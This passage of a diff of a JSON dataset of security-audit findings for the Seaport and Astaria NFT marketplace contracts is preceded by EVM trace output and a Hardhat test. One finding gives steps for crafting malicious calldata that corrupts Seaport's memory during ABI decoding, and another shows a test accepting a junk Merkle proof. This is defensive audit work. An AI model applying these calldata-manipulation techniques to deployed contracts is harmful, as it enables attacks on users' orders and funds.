00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| DUP1 Stack: 00000000 00000001 00000002 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 REVERT Stack: 00000000 00000001 00000002 00000003 Memory: 00000000 00000010 00000020 00000030 00000040 00000050 pc=00000019 gas=4699946 cost=3 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| pc=00000020 gas=4699943 cost=0 0x0 0x0 0x80 0x4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 80 |................| #### LOGS #### genesis.json: { \"gasLimit\": \"4700000\", \"difficulty\": \"1\", \"alloc\": { \"0xb4d0000000000000000000000000000000000000\": { \"balance\": \"10000000000000000000000000\", \"code\": \"\", \"storage\": {} } } } // file: test/zone.spec.ts ... it(\"Fulfills an order with executeMatchAdvancedOrders with NATIVE Consideration Item\", async () => { const pausableZoneControllerFactory = await ethers.getContractFactory( \"PausableZoneController\", owner ); const pausableZoneController = await pausableZoneControllerFactory.deploy( owner.address ); // Deploy pausable zone const zoneAddr = await createZone(pausableZoneController); 15 // Mint NFTs for use in orders const nftId = await mintAndApprove721(seller, marketplaceContract.address); // Define orders const offerOne = [ getTestItem721(nftId, toBN(1), toBN(1), undefined, testERC721.address), ]; const considerationOne = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), seller.address ), ]; const { order: orderOne, orderHash: orderHashOne } = await createOrder( seller, zoneAddr, offerOne, considerationOne, 2 ); const offerTwo = [ getOfferOrConsiderationItem( 0, ethers.constants.AddressZero, toBN(0), parseEther(\"0.01\"), parseEther(\"0.01\"), undefined ), ]; const considerationTwo = [ getTestItem721( nftId, toBN(1), toBN(1), buyer.address, testERC721.address ), ]; const { order: orderTwo, orderHash: orderHashTwo } = await createOrder( buyer, zoneAddr, offerTwo, considerationTwo, 2 ); const fulfillments = [ [[[0, 0]], [[1, 0]]], [[[1, 0]], [[0, 0]]], ].map(([offerArr, considerationArr]) => toFulfillment(offerArr, considerationArr) ); // Perform the match advanced orders with zone const tx = await pausableZoneController .connect(owner) 16 .executeMatchAdvancedOrders( zoneAddr, marketplaceContract.address, [orderOne, orderTwo], [], fulfillments, { value: parseEther(\"0.01\").add(1) } // the extra 1 wei reverts the tx ); // Decode all events and get the order hashes const orderFulfilledEvents = await decodeEvents(tx, [ { eventName: \"OrderFulfilled\", contract: marketplaceContract }, ]); expect(orderFulfilledEvents.length).to.equal(fulfillments.length); // Check that the actual order hashes match those from the events, in order const actualOrderHashes = [orderHashOne, orderHashTwo]; orderFulfilledEvents.forEach((orderFulfilledEvent, i) => expect(orderFulfilledEvent.data.orderHash).to.be.equal( actualOrderHashes[i] ) ); }); ... This bug also applies to Seaport 1.1 and PausableZone (0x004C00500000aD104D7DBd00e3ae0A5C00560C00)", + "title": "An owner might not be able to cancel all signed liens by calling incrementNonce()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "If the vault owner or the delegate is phished into signing terms with consecutive nonces in a big range, they would not be able to cancel all those terms with the current incrementNonce() implementation as this value is only incrementing the nonce one at a time. As an example Seaport increments their counters using the following formula n += blockhash(block.number - 1) << 0x80;", "labels": [ "Spearbit", - "Seaport", - "Severity: Medium Risk" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "ABI decoding for bytes: memory can be corrupted by maliciously constructing the calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the code snippet below, size can be made 0 by maliciously crafting the calldata. In this case, the free memory is not incremented. assembly { mPtrLength := mload(0x40) let size := and( add( and(calldataload(cdPtrLength), OffsetOrLengthMask), AlmostTwoWords ), OnlyFullWordMask ) calldatacopy(mPtrLength, cdPtrLength, size) mstore(0x40, add(mPtrLength, size)) } This has two different consequences: 1. If the memory offset mPtrLength is immediately used then junk values at that memory location can be interpreted as the decoded bytes type. In the case of Seaport 1.2, the likelihood of the current free memory pointing to junk value is low. So, this case has low severity. 17 2. The consequent memory allocation will also use the value mPtrLength to store data in memory. This can lead to corrupting the initial memory data. In the worst case, the next allocation can be tuned so that the first bytes data can be any arbitrary data. To make the size calculation return 0: 1. Find a function call which has bytes as a (nested) parameter. 2. Modify the calldata field where the length of the above byte is stored to the new length 0xffffe0. 3. The calculation will now return size = 0. Note: there is an additional requirement that this bytes type should be inside a dynamic struct. Otherwise, for example, in case of function foo(bytes calldata signature) , the compiler will insert a check that calldata- size is big enough to fit signature.length. Since the value 0xffffe0 is too big to be fit into calldata, such an attack is impractical. However, for bytes type inside a dynamic type, for example in function foo(bytes[] calldata signature), this check is skipped by solc (likely because it's expensive). For a practical exploit we need to look for such function. In case of Seaport 1.2 this could be the matchAdvancedOrders(AdvancedOrder[] calldata orders, ...) function. The struct AdvancedOrder has a nested parameter bytes signature as well as bytes extraData. In the above exploit one would be able to maliciously modify the calldata in such a way that Seaport would interpret the data in extraData as the signature. Here is a proof of concept for a simplified case that showcases injecting an arbitrary value into a decoded bytes. As for severity, even though interpreting calldata differently may not fundamentally break the protocol, an attacker with enough effort may be able to use this for subtle phishing attacks or as a precursor to other attacks.", + "title": "Error handling for USDT transactions in TransferProxy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "To handle edge cases where the receiver is blacklisted, TransferProxy.tokenTransferFromWithErrorReceiver(...) is designed to catch errors that may occur during the first transfer attempt and then proceed to send the tokens to the error receiver. try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } However, it's worth noting that this approach may not be compatible with non-standard ERC20 tokens (e.g., USDT) that do not return any value after a transferFrom operation. The try-catch pattern in Solidity can only catch errors resulting from reverted external contract calls, but it does not handle errors caused by inconsistent return values. Consequently, when using USDT, the entire transaction will revert.", "labels": [ "Spearbit", - "Seaport", - "Severity: Medium Risk" + "Astaria", + "Severity: Low Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with different consideration recipients that would break the aggregation routine", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport receives a collection of advanced orders to match or fulfill, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. genera- teOrder(...) can provide new consideration item recipients for this order. These new recipients are going to be used for this order from this point on. In _getGeneratedOrder, there is no comparison between old or new consideration recipients. The provided new recipients can create an issue when aggregating consideration items. Since the fulfillment data is provided beforehand by the caller of the Seaport endpoint, the caller might have provided fulfillment aggregation data that would have aggregated/combined one of the consideration items of this changed advance order with another consideration item. But the aggregation had taken into consideration the original recipient of the order in question. Multiple consideration items can only be aggregated if they share the same itemType, token, identi- fier, and recipient (ref). The new recipients provided by the contract offerer can break this invariant and in turn cause a revert.", + "title": "PublicVault does not handle funds in errorReceiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "involves PROXY.tokenTransferFromWithErrorReceiver. The implementation in the TransferProxy contract involves sending the tokens to an error receiver that is con- trolled by the original receiver. However, this approach can lead to accounting errors in the PublicVault as PublicVault does not pull tokens from the error receiver. process transferProxy.TRANSFER_- LienToken.MakePayment(...), function from the in the tokens using user the to function tokenTransferFromWithErrorReceiver( // ... ) { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Note that, in practice, tokens would not be transferred to the error receiver. The issue is hence considered to be a low-risk issue.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "CriteriaResolvers.criteriaProof is not validated in the identifierOrCriteria == 0 case", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the case of identifierOrCriteria == 0, the criteria resolver completely skips any validations on the Merkle proof and in particular is missing the validation that CriteriaResolvers.criteriaProof.length == 0. Note: This is also present in Seaport 1.1 and may be a known issue. Proof of concept: modified @@ -3568,9 +3568,8 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { test/advanced.spec.ts // Seller approves marketplace contract to transfer NFTs await set1155ApprovalForAll(seller, marketplaceContract.address, true); - - + const { root, proofs } = merkleTree([nftId]); const offer = [getTestItem1155WithCriteria(root, toBN(1), toBN(1))]; const offer = [getTestItem1155WithCriteria(toBN(0), toBN(1), toBN(1))]; const consideration = [ getItemETH(parseEther(\"10\"), parseEther(\"10\"), seller.address), @@ -3578,8 +3577,9 @@ describe(`Advanced orders (Seaport v${VERSION})`, function () { getItemETH(parseEther(\"1\"), parseEther(\"1\"), owner.address), ]; + - + // Add a junk criteria proof and the test still passes const criteriaResolvers = [ buildResolver(0, 0, 0, nftId, proofs[nftId.toString()]), buildResolver(0, 0, 0, nftId, ,! [\"0xdead000000000000000000000000000000000000000000000000000000000000\"]), ]; const { order, orderHash, value } = await createOrder(", + "title": "Inconsistent Vault Fee Charging during Loan Liquidation via WithdrawProxy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In the smart contract code of PublicVault, there is an inconsistency related to the charging of fees when a loan is liquidated at epoch's roll and the lien is sent to WithdrawProxy. The PublicVault.owner is supposed to take a ratio of the interest paid as the strategist's reward, and the fee should be charged when a payment is made in the function PublicVault.updateVault(...), regardless of whether it's a normal payment or a liquidation payment. It appears that the fee is not being charged when a loan is liquidated at epoch's roll and the lien is sent to With- drawProxy. This discrepancy could potentially lead to an inconsistent distribution of fees and rewards.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Calls to TypehashDirectory will be successful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "TypehashDirectory's deployed bytecode starts with 00 which corresponds to STOP opcode (SSTORE2 also uses this pattern). This choice for the 1st bytecode causes accidental calls to the contract to succeed silently.", + "title": "VaultImplementation.init(...) silently initialised when the allowlist parameters are not throughly validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In VaultImplementation.init(...), if params.allowListEnabled is false but params.allowList is not empty, s.allowList does not get populated.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "_isValidBulkOrderSize does not perform the signature length validation correctly.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In _isValidBulkOrderSize the signature's length validation is performed as follows: let length := mload(signature) validLength := and( lt(length, BulkOrderProof_excessSize), lt(and(sub(length, BulkOrderProof_minSize), AlmostOneWord), 2) ) The sub opcode in the above snippet wraps around. If this was the correct formula then it would actually simplify to: lt(and(sub(length, 3), AlmostOneWord), 2) The simplified and the current version would allow length to also be 3, 4, 35, 36, 67, 68 but _isValidBulkOrder- Size actually needs to check that length ( l ) has the following form: where x 2 f0, 1g and y 2 f1, 2, (cid:1) (cid:1) (cid:1) , 24g ( y represents the height/depth of the bulk order).", + "title": "Several functions in AstariaRouter can be made non-payable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Following functions in AstariaRouter are payable when they should never be sent the native token: mint(), deposit(), withdraw(), redeem(), pullToken()", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the contract offerer through ratifyOrder would be smaller than the actual stored nonce", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When contractNonce occupies more than 12 bytes the truncated nonce shared back with the con- tract offerer through ratifyOrder would be smaller than the actual stored nonce: // Write contractNonce to calldata dstHead.offset(ratifyOrder_contractNonce_offset).write( uint96(uint256(orderHash)) ); This is due to the way the contractNonce and the offerer's address are mixed in the orderHash: assembly { orderHash := or(contractNonce, shl(0x60, offerer)) }", + "title": "Loan duration can be reduced at the time of borrowing without user permission", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Requested loan duration, if greater than the maximum allowed duration (the time to next epoch's end), is set to this maximum value: if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } This happens without explicit user permission.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "abi_decode_bytes does not mask the copied data length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When abi_decode_bytes decodes bytes, it does not mask the copied length of the data in memory (other places where the length is masked by OffsetOrLengthMask).", + "title": "Native tokens sent to DepositHelper can get locked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "DepositHelper has the following two endpoints: fallback() external payable {} receive() external payable {} If one calls this contract by not supplying the deposit(...) function signature, the msg.value provided would get locked in this contract.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "OrderHash in the context of contract orders need not refer to a unique order", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In Seaport 1.1 and in Seaport 1.2 for non-contract orders, order hashes have a unique correspon- dence with the order, i.e., it can be used to identify the status of an order on-chain and track it. However, in case of contract orders, this is not the case. It is simply the current nonce of the offerer, combined with the address. This cannot be used to uniquely track an order on-chain. uint256 contractNonce; unchecked { contractNonce = _contractNonces[offerer]++; } assembly { orderHash := or(contractNonce, shl(0x60, offerer)) } Here are some example scenarios where this can be problematic: Scenario 1: A reverted contract order and the adjacent succeeding contract order will have the same order hash, regardless of whether they correspond to the same order. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Assume that this transaction failed because enough gas was not provided for the generateOrder call. This tx would revert with a custom error InvalidContrac- tOrder, generated from OrderValidator.sol#L391. 22 2. Consider Bob calling fulfilledAdvancedOrder for a different contract order with offerer = X, same smart contract offerer. OrderFulfiller.sol#L124 This order will succeed and emit the OrderFulfilled event the from In the above scenario, there are two different orders, one that reverted on-chain and the other that succeeded, both having the same orderHash despite the orders only sharing the same contract offerer--the other parameters can be completely arbitrary. Scenario 2: Contract order hashes computed off-chain can be misleading. 1. Consider Alice calling fulfilledAdvancedOrder for a contract order with offerer = X, where X is a smart contract that offers contract orders on Seaport 1.2. Alice computed the orderHash of their order off-chain by simulating the transaction, sends the transaction and polls the OrderFulfilled event with the same orderHash to know if the order has been fulfilled. 2. Consider Bob calling fulfilledAdvancedOrder for any contract order with offerer = X, the same smart contract offerer. 3. Bob's transaction gets included first. An OrderFulfilled event is emitted, with the orderHash to be the same hash that Alice computed off-chain! Alice may believe that their order succeeded. for non-contract Orders, the above approach would be valid, i.e., one may generate and sign an order, Note: compute the order hash of an order off-chain and poll for an OrderFulfilled with the order hash to know that it was fulfilled. Note: even though there is an easier way to track if the order succeeded in these cases, in the general case, Alice or Bob need not be the one executing the orders on-chain. And an off-chain agent may send misleading notifications to either parties that their order succeeded due to this quirk with contract order hashes.", + "title": "Updated ...EpochLength values are not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Sanity check is missing for updated s.minEpochLength and s.maxEpochLength. Need to make sure s.minEpochLength <= s.maxEpochLength", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "When _contractNonces[offerer] gets updated no event is emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When _contractNonces[offerer] gets updated no event is emitted. This is in contrast to when a counter is updated. One might be able to extract the _contractNonces[offerer] (if it doesn't overflow 12 bytes to enter into the offerer region in the orderhash) from a later event when OrderFulfilled gets emited. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...)'s return data satisffies all the constraints.", + "title": "CollateralToken's conduit would have an open channel to an old Seaport when Seaport is updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "After filing for a new Seaport the old Seaport would still have an open channel to it from the Col- lateralToken's conduit (assuming the old and new Seaport share the same conduit controller).", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "In general a contract offerer or a zone cannot draw a conclusion accurately based on the spent offer amounts or received consideration amounts shared with them post-trasnfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items will go through different modification steps in the memory. In particular, the startAmount a of these items is an important parameter to inspect: a ! a0 ! b ! a0 a : original startAmount parameter shared to Seaport by the caller encoded in the memory. a0 : the interpolated value and for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation does not have an effect in this case since the startAmount and endAmount are enforced to be equal). b : must be 0 for used consideration items, otherwise the call would revert. For offer items, it can be in [0, 1) (See The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general). a0 : is the final amount shared by Seaport to either a zone for restricted orders and a contract offerer for CONTRACT order types. Offer Items For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maxi- mum a0 of that specific offer item. For the case of restricted orders where the zone's validateOrder(...) will be called, the offerer might end up spending more than a0 amount of a specific token with the same identifier if the collection of orders includes: A mix of open and restricted orders. Multiple zones for the same offerer, offering the same token with the same identifier. Multiple orders using the same zone. In this case, the zone might not have a sense of the orders of the transfers or which orders are included in the transaction in question (unless the contexts used by the zone enforces the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given a fulfillment data to combine/aggregate orders, there could be permutations of it that create different ordering of the executions. An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. And when Seaport calls into (NATIVE, ERC1155 token transfers, ...) this actor, the actor would transfer the token to a different address than the offerer. There also is a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, con- tract offerer, weird token, ...) can cross-call into (related Cross-Seaport re-entrancy with the stateful validateOrder call). The above issue can be avoided if the offerer makes sure to not sign different transactions across different or the same instances of Seaport which 1. Share the same offer type, offer token, and offer identifier, 2. but differ in a mix of zone, and order type 24 3. can be active at a shared timestamp And/or the offerer does not give untrusted parties their token approvals. A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types. Consideration Items For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a0 of that specific consideration item. This case also is similar to the offer items issues above when a mix of orders has been used.", + "title": "CollateralToken's tokenURI uses the underlying assets's tokenURI", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Since the CollateralToken positions can be sold on secondary markets like OpenSea, the tokenURI endpoint should be customised to avoid misleading users and it should contain information relating to the Collat- eralToken and not just its underlying asset. It would also be great to pull information from its associated lien to include here. What-is-OpenSea-s-copymint-policy. docs.opensea.io/docs/metadata-standards. Necromint got banned on OpenSea.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Cross-Seaport re-entrancy with the stateful validateOrder call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario would happen when if the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross Seaport re-entrancy. This is not immediately problematic as Zones have limited functionality currently. But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport. Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it's also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3. Note: also see getOrderStatus and getContractOffererNonce are prone to view reentrancy for concerns around view-only re-entrancy.", + "title": "Filing to update one of the main contract for another main contract lacks validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The main contracts AstariaRouter, CollateralToken, and LienToken all need to be aware of each other and form a connected triangle. They are all part of a single unit and perhaps are separated into 3 different contract due to code size and needing to have two individual ERC721 tokens. Their authorised filing structure is as follows: Note that one cannot file for CollateralToken to change LienToken as the value of LienToken is only set during the CollateralToken's initialisation. If one files to change one of these nodes and forget to check or update the links between these contract, the triangle above would be broken.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "getOrderStatus and getContractOffererNonce are prone to view reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Nonces[offerer] gets updated if there is a mix of contract offerer orders and partial orders are used, Seaport would call into the offerer contracts (let's call one of these offerer contracts X ). In turn X can be a contract that would call into other contracts (let's call them Y ) that take into consideration _orderStatus[orderHash] or _contractNonces[offerer] in their codebase by calling getOrderStatus or getContractOffererNonce The values for _orderStatus[orderHash] or _contractNonces[offerer] might get updated after Y seeks those from Seaport due to for example multiple partial orders with the same orderHash or multiple offerer contract orders using the same offerer. Therefore Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed.", + "title": "TRANSFER_PROXY is not queried in a consistent fashion.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Different usages of TRANSFER_PROXY and how it is queried AstariaRouter: Used in pullToken(...) to move tokens from the msg.sender to a another address. CollateralToken: Used in validateOrder(...) where Seaport has callbacked into. Here Collateral- Token gives approval to TRANSFER_PROXY which is queried from AstariaRouter for the settlement tokens. TRANSFER_PROXY is also used to transfer tokens. 47 LienToken: In _payment(...) TRANSFER_PROXY is used to transfer tokens from CollateralToken to the lien owner. This implies that the TRANSFER_PROXY used in CollateralToken should be the same that is used in LienToken. Therefore, from the above we see that: 1. TRANSFER_PROXY holds tokens approvals for ERC20 or wETH tokens used as lien tokens. 2. TRANSFER_PROXY's address should be the same at all call sites for the different contract AstariaRouter, CollateralToken and LienToken. 3. Except CollateralToken which queries TRANSFER_PROXY from AstariaRouter, the other two contract As- tariaRouter and LienToken read this value from their storage. Note that the deployment script sets assigns the same TRANSFER_PROXY to all the 3 main contracts in the codebase AstariaRouter, CollateralToken, and LienToken.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "The size calculation can be incorrect for large numbers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The maximum value of memory offset is defined in PointerLibraries.sol#L22 as OffsetOr- LengthMask = 0xffffffff, i.e., 232 (cid:0) 1. However, the mask OnlyFullWordMask = 0xffffe0; is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0, then the following piece of code incorrectly computes the size as 0. function abi_encode_bytes( MemoryPointer src, MemoryPointer dst ) internal view returns (uint256 size) { unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... This is because the constant OnlyFullWordMask does not have the two higher order bytes set (as a 32-bit type). Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks. 26", + "title": "Multicall when inherited to ERC4626RouterBase does not bubble up the reverts correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Multicall does not bubble up the reverts correctly. The current implementation uses the following snippet to bubble up the reverts // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/Multicall.sol pragma solidity >=0.7.6; if (!success) { // Next 5 lines from https://ethereum.stackexchange.com/a/83577 if (result.length < 68) revert(); assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } 48 // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/ERC4626RouterBase.sol pragma solidity ^0.8.17; ... abstract contract ERC4626RouterBase is IERC4626RouterBase, Multicall { ... } This method of bubbling up does not work with new types of errors: Panic(uint256) 0.8.0 (2020-12-16) Custom errors introduced in 0.8.4 (2021-04-21) ...", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "_prepareBasicFulfillmentFromCalldata expands memory more than it's needed by 4 extra words", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In _prepareBasicFulfillmentFromCalldata , we have: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(0x80, add(eventDataPtr, dataSize))) OrderFulfilled's event data is stored in the memory in the region [eventDataPtr, eventDataPtr + dataSize). It's important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the above 4 words, 0x80, in the snippet are extra. example, For in test/basic.spec.ts the Seaport memory profile at tract.connect(buyer).fulfillBasicOrder(basicOrderParameters, {value,}) looks like: \"ERC721 <=> ETH (basic, minimal and verified on-chain)\" case the call of marketplaceCon- the end of test the in 28 0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id) ,! 0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ... 0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer 0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot 0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash 0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer 0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone 0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho) 0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n]) 0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType 0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime 0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime 0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash 0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller 0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offerer array head ,! 0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head ,! 0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length 0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType 0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token 0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria 0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount ,! 0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1 ,! 0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType 0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE) 0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria ,! 0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount ,! 0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer 0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused 0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length 0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31] 0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63] 0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns ,! (bool fulfilled) Notice that 4 unused memory slots. Transaction Trace This is also a good example to see that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten to due 